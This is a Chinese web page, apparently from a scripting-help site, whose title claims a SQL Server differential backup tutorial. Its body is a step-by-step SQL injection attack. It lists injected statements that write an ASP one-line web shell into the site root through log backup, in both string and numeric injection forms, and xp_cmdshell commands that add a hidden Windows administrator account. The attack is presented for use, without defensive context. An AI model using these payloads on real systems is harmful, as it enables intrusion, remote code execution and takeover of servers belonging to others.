腳本之家服務(wù)器常用軟件

快捷導(dǎo)航

軟件下載

android MAC 驅(qū)動(dòng)下載字體下載 DLL

源碼下載

PHP ASP.NET ASP JSP

軟件編程

C# JAVA C 語(yǔ)言 Delphi Android

網(wǎng)絡(luò)編程

PHP ASP.NET ASP JavaScript

在線工具

CSS格式化 JS格式化 Html轉(zhuǎn)化為Js

數(shù)據(jù)庫(kù)

MYSQL MSSQL oracle DB2 MARIADB

CMS

PHPCMS DEDECMS 帝國(guó)CMS WordPress

常用工具

PHP開(kāi)發(fā)工具 python Photoshop 必備軟件

sqlserver 手工實(shí)現(xiàn)差異備份的步驟

更新時(shí)間：2011年04月01日 00:54:54 作者：

sqlserver 手工實(shí)現(xiàn)差異備份的步驟,需要的朋友可以參考下。

手工實(shí)現(xiàn)差異備份的步驟

字符型：

1、恢復(fù)當(dāng)前庫(kù)
;alter database 當(dāng)前庫(kù) set RECOVERY FULL--

2、建表cmd
;create table cmd (a image)--

3、備份當(dāng)前庫(kù)到D:\cmd1
;backup log 當(dāng)前庫(kù) to disk = 'D:\cmd1' with init--

4、插入一句話代碼到創(chuàng)建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5、備份一句話代碼到站點(diǎn)根目錄
;backup log 當(dāng)前庫(kù) to disk = 'D:\www_web\oct.asp'--

6、完成
;drop table 創(chuàng)建的表--

數(shù)字型

1、恢復(fù)當(dāng)前庫(kù)
';alter database 當(dāng)前庫(kù) set RECOVERY FULL--

2、創(chuàng)建表cmd
';create table cmd (a image)--

3、備份當(dāng)前庫(kù)到D:\cmd1
';backup log 當(dāng)前庫(kù) to disk = 'D:\cmd1' with init--

4、插入一句話代碼到創(chuàng)建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5、備份一句話代碼到站點(diǎn)根目錄
';backup log 當(dāng)前庫(kù) to disk = 'D:\www_web\oct.asp'--

6、完成
';drop table 創(chuàng)建的表--

sa權(quán)限創(chuàng)建管理員用戶

1、判斷是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判斷當(dāng)前系統(tǒng)的連接用戶是不是sa

2、添加系統(tǒng)的管理員
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--

逍遙復(fù)仇：有工具我是一定不會(huì)手工的，麻煩。

您可能感興趣的文章:

相關(guān)文章

SQL cursor用法實(shí)例
這篇文章介紹了SQL cursor用法實(shí)例，有需要的朋友可以參考一下
2013-09-09
SQL Server中發(fā)送HTML格式郵件的方法
這篇文章主要介紹了SQL Server中發(fā)送HTML格式郵件的方法,需要的朋友可以參考下
2014-10-10
淺談數(shù)據(jù)庫(kù)日期類(lèi)型字段設(shè)計(jì)應(yīng)該如何選擇
本文主要介紹了數(shù)據(jù)庫(kù)日期類(lèi)型字段設(shè)計(jì)應(yīng)該如何選擇，文中通過(guò)示例代碼介紹的非常詳細(xì)，對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值，需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
2022-08-08
sqlserver 索引的一些總結(jié)
如果說(shuō)要對(duì)數(shù)據(jù)庫(kù)進(jìn)行優(yōu)化，我們主要可以通過(guò)以下五種方法，對(duì)數(shù)據(jù)庫(kù)系統(tǒng)進(jìn)行優(yōu)化
2012-08-08
數(shù)據(jù)庫(kù) 關(guān)鍵字一覽表
這篇文章主要介紹了數(shù)據(jù)庫(kù) 關(guān)鍵字一覽表的相關(guān)資料,需要的朋友可以參考下
2016-10-10
使用SQL語(yǔ)句將相同名的多行字段內(nèi)容拼接(方法詳解)
這篇文章主要介紹了使用SQL語(yǔ)句將相同名的多行字段內(nèi)容拼接起來(lái),可以使用GROUP_CONCAT函數(shù)來(lái)實(shí)現(xiàn)相同名稱的多行字段內(nèi)容拼接，本文給大家介紹的非常詳細(xì)，需要的朋友可以參考下
2023-05-05
SQL Server誤區(qū)30日談第18天有關(guān)FileStream的存儲(chǔ)，垃圾回收以及其它
由于FileStream數(shù)據(jù)容器(指的是存放FileStream文件的NTFS文件夾，杜撰出來(lái)的術(shù)語(yǔ))必須像數(shù)據(jù)文件或日志文件那樣符合本地存儲(chǔ)策略-也就是說(shuō)，這個(gè)數(shù)據(jù)容器必須放在對(duì)于運(yùn)行SQL Server的Windows Server是本地存儲(chǔ)
2013-01-01
一個(gè)常用的報(bào)表統(tǒng)計(jì)SQL語(yǔ)句
在平常的系統(tǒng)開(kāi)發(fā)中，我們經(jīng)常會(huì)遇到類(lèi)似下圖的報(bào)表統(tǒng)計(jì)功能需求。
2010-12-12
使用SQL語(yǔ)句去掉重復(fù)的記錄【兩種方法】
這篇文章主要介紹了用SQL語(yǔ)句去掉重復(fù)的記錄的兩種方式，兩種方式都可以使用臨時(shí)表操作，具體實(shí)現(xiàn)方法大家跟隨腳本之家小編一起通過(guò)本文學(xué)習(xí)吧
2018-05-05
sql語(yǔ)句中單引號(hào)嵌套問(wèn)題(一定要避免直接嵌套)
直接嵌套肯定是不行的，java中用反斜杠做轉(zhuǎn)義符也是不行的，在sql中是用單引號(hào)來(lái)做轉(zhuǎn)義符的
2014-09-09